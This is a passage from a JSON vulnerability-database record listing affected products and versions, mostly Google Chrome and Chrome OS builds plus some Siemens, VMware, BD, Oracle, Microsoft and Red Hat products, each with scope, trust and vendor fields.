      {
        "model": "pyxis supplystation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1651.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1003.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.322.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.391.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.107"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.6"
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1664.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.89"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "64.0.3282.167"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1031"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "58.0.3029.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1007.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.40"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.326.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.62"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.1.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1680.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.603.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.39"
      },
      {
        "model": "sinema remote connect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.686.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.213"
      },
      {
        "model": "x-series xos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "9.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.32"
      },
      {
        "model": "simatic field pg m5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "22.1.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1010"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.113"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.337"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.27"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.170"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.33"
      },
      {
        "model": "simatic hmi comfort panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1051"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.112"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.119"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.896.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.152"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.417.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.218"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.334"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.657.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1049"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.331"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.667.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1057"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1673.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.689.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.152"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1288.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.390.0"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1655.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.707.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1011.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1081.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.50"
      },
      {
        "model": "fusion",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5.9"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1067.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.44"
      },
      {
        "model": "communications lsms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "13.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1664.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.801.0"
      },
      {
        "model": "rowa smart",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1048.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.807.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.865.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1296.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.481.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.489.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "51.0.2704.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.121"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.47"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "45.0.2454.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "60.0.3080.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.104"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.96"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.572.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.356.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1055.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.93"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.786.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "36.0.1985.122"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1039.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.447.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.836.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.23"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.642.1"
      },
      {
        "model": "lsrfortessa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "x-200"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.216"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.591.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "45.0.2454.101"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.99"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.107"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.168"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1012.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.278.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.413.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.580.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.123"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.146"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.513.0"
      },
      {
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.149.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1042"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.158.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.761.1"
      },
      {
        "model": "windows server r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.45"
      },
      {
        "model": "sinumerik pcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "50.5"
      },
      {
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.130"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.765.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.100"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.108"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.553.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.494.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.745.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.484.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.25"
      },
      {
